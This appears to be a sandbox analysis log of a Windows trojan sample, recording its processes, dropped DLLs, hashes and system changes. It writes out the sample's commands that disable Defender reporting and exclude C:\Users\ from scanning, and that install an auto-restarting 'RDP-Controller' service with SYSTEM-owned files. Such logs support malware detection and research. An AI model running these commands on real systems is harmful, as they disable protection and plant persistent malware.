Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 20_2_00007FFE0EB49EA7 strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,

20_2_00007FFE0EB49EA7

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

File deleted: C:\Windows\Temp\bIMtvCd7

Source: C:\Users\user\Desktop\80P.exe	Code function: 0_2_02EB53EA	0_2_02EB53EA
Source: C:\Users\user\Desktop\80P.exe	Code function: 0_2_02EA4B4A	0_2_02EA4B4A
Source: C:\Users\user\Desktop\80P.exe	Code function: 0_2_02EA5B3E	0_2_02EA5B3E
Source: C:\Users\user\Desktop\80P.exe	Code function: 0_2_02EA60CE	0_2_02EA60CE
Source: C:\Users\user\Desktop\80P.exe	Code function: 0_2_02EB701E	0_2_02EB701E
Source: C:\Users\user\Desktop\80P.exe	Code function: 0_2_02EBD122	0_2_02EBD122
Source: C:\Users\user\Desktop\80P.exe	Code function: 0_2_02EA7F2E	0_2_02EA7F2E
Source: C:\Users\user\Desktop\80P.exe	Code function: 0_2_02EA9CF6	0_2_02EA9CF6
Source: C:\Users\user\Desktop\80P.exe	Code function: 0_2_02EACDA6	0_2_02EACDA6
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FF6BFD72098	20_2_00007FF6BFD72098
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FF6BFD6C4C0	20_2_00007FF6BFD6C4C0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE0E1709C0	20_2_00007FFE0E1709C0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE0EB525F0	20_2_00007FFE0EB525F0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE0EBDF020	20_2_00007FFE0EBDF020
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE0EC0EB40	20_2_00007FFE0EC0EB40
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE1150A8B5	20_2_00007FFE1150A8B5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE1150A558	20_2_00007FFE1150A558
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE1150A78B	20_2_00007FFE1150A78B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE1150A643	20_2_00007FFE1150A643
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE11510710	20_2_00007FFE11510710
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 20_2_00007FFE1330CBC0	20_2_00007FFE1330CBC0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE116C09C0	31_2_00007FFE116C09C0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE116F25F0	31_2_00007FFE116F25F0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE1171F020	31_2_00007FFE1171F020
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE1174EB40	31_2_00007FFE1174EB40
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE1177A8B5	31_2_00007FFE1177A8B5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE1177A558	31_2_00007FFE1177A558
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE1177A78B	31_2_00007FFE1177A78B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE11780710	31_2_00007FFE11780710
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 31_2_00007FFE1177A643	31_2_00007FFE1177A643

Source: Joe Sandbox View	Dropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll 5E38EA7E3DD96FE1C6BB2EBA38C7BDE638C6B6E7898F906E343D9500AFF86499
Source: Joe Sandbox View	Dropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll 0B628EA2BA9CD77621D90A0A7456659ED86C118EB7655F6074B3B5648BAC0A02
Source: Joe Sandbox View	Dropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll 64B09FAC89FC9645DFE624D832BB2FF2FC8BA6BA9BC1A96C6EEE8C7F9C021266

Source: C:\Windows\System32\icacls.exe

Process token adjusted: Security

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE11501292 appears 377 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE1330A202 appears 345 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE0E161292 appears 462 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE116B1292 appears 462 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE116E1292 appears 515 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FF6BFD699E2 appears 303 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE11771292 appears 377 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE0EB41292 appears 515 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE11711292 appears 394 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE0EC02FD2 appears 387 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE0EBD1292 appears 394 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: String function: 00007FFE11742FD2 appears 387 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 4124 -ip 4124

Source: samctl.dll.20.dr	Static PE information: Number of sections : 11 > 10
Source: NCdDxWNe.20.dr	Static PE information: Number of sections : 11 > 10
Source: wwgq2y6S.20.dr	Static PE information: Number of sections : 11 > 10
Source: 6DPA479I.20.dr	Static PE information: Number of sections : 11 > 10
Source: TzijR9kt.20.dr	Static PE information: Number of sections : 11 > 10
Source: dwlmgr.dll.20.dr	Static PE information: Number of sections : 11 > 10
Source: cnccli.dll.20.dr	Static PE information: Number of sections : 11 > 10
Source: evtsrv.dll.20.dr	Static PE information: Number of sections : 11 > 10
Source: prgmgr.dll.20.dr	Static PE information: Number of sections : 11 > 10
Source: libi2p.dll.20.dr	Static PE information: Number of sections : 11 > 10
Source: ia0qD2w9.20.dr	Static PE information: Number of sections : 11 > 10
Source: I2Hoxnam.20.dr	Static PE information: Number of sections : 11 > 10
Source: 9m9shiPj.20.dr	Static PE information: Number of sections : 11 > 10
Source: termsrv32.dll.20.dr	Static PE information: Number of sections : 11 > 10
Source: 80P.exe	Static PE information: Number of sections : 11 > 10
Source: rdpctl.dll.20.dr	Static PE information: Number of sections : 11 > 10
Source: oWkqS6Ji.20.dr	Static PE information: Number of sections : 11 > 10

Source: 80P.exe, 00000000.00000000.1678570967.0000000000EA4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameIntegrator.exe@ vs 80P.exe
Source: 80P.exe, 00000000.00000002.1682278178.0000000002D0C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs 80P.exe
Source: 80P.exe, 00000001.00000002.2934405882.0000000002E4C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs 80P.exe
Source: 80P.exe	Binary or memory string: OriginalFilenameIntegrator.exe@ vs 80P.exe

Source: classification engine

Classification label: mal100.troj.evad.winEXE@43/69@4/64

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 20_2_00007FF6BFD613B9 FindResourceA,LoadResource,GetLastError,GetLastError,GetLastError,GetLastError,

20_2_00007FF6BFD613B9

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 20_2_00007FF6BFD68C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,

20_2_00007FF6BFD68C4A

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 20_2_00007FF6BFD68C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,

20_2_00007FF6BFD68C4A

Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe

File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1608:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \BaseNamedObjects\Local\WERReportingForProcess4124
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6172:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:5812:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2032:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2312:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:120:WilError_03

Source: C:\Users\user\Desktop\80P.exe

File created: C:\Users\user\AppData\Local\Temp\vlvy6qwtf6rg470fegk71sh09imwbh3.bat

Jump to behavior

Source: C:\Users\user\Desktop\80P.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\vlvy6qwtf6rg470fegk71sh09imwbh3.bat"

Source: 80P.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\80P.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\WerFault.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

File read: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\config.ini

Source: C:\Users\user\Desktop\80P.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 80P.exe

Virustotal: Detection: 8%

Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: main.exe	String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: 80P.exe	String found in binary or memory: gfx/loading.gif">
Source: 80P.exe	String found in binary or memory: /gfx/loading.gif
Source: 80P.exe	String found in binary or memory: gfx/loading.gif
Source: 80P.exe	String found in binary or memory: Execute via &Default browser/Launch default browser and execute application.

Source: unknown	Process created: C:\Users\user\Desktop\80P.exe "C:\Users\user\Desktop\80P.exe"
Source: unknown	Process created: C:\Users\user\Desktop\80P.exe C:\Users\user\Desktop\80P.exe
Source: C:\Users\user\Desktop\80P.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\vlvy6qwtf6rg470fegk71sh09imwbh3.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Users\user\Desktop\80P.exe	Process created: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe "C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe"
Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe	Process created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Source: C:\Windows\System32\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe	Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe	Process created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe	Process created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe	Process created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Windows\System32\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl
Source: C:\Windows\System32\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 4124 -ip 4124
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4124 -s 1232
Source: unknown	Process created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\Desktop\80P.exe	Process created: C:\Users\user\Desktop\80P.exe C:\Users\user\Desktop\80P.exe	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\vlvy6qwtf6rg470fegk71sh09imwbh3.bat"	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Process created: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe "C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe	Process created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe	Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe	Process created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe	Process created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe	Process created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 4124 -ip 4124
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4124 -s 1232
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\80P.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
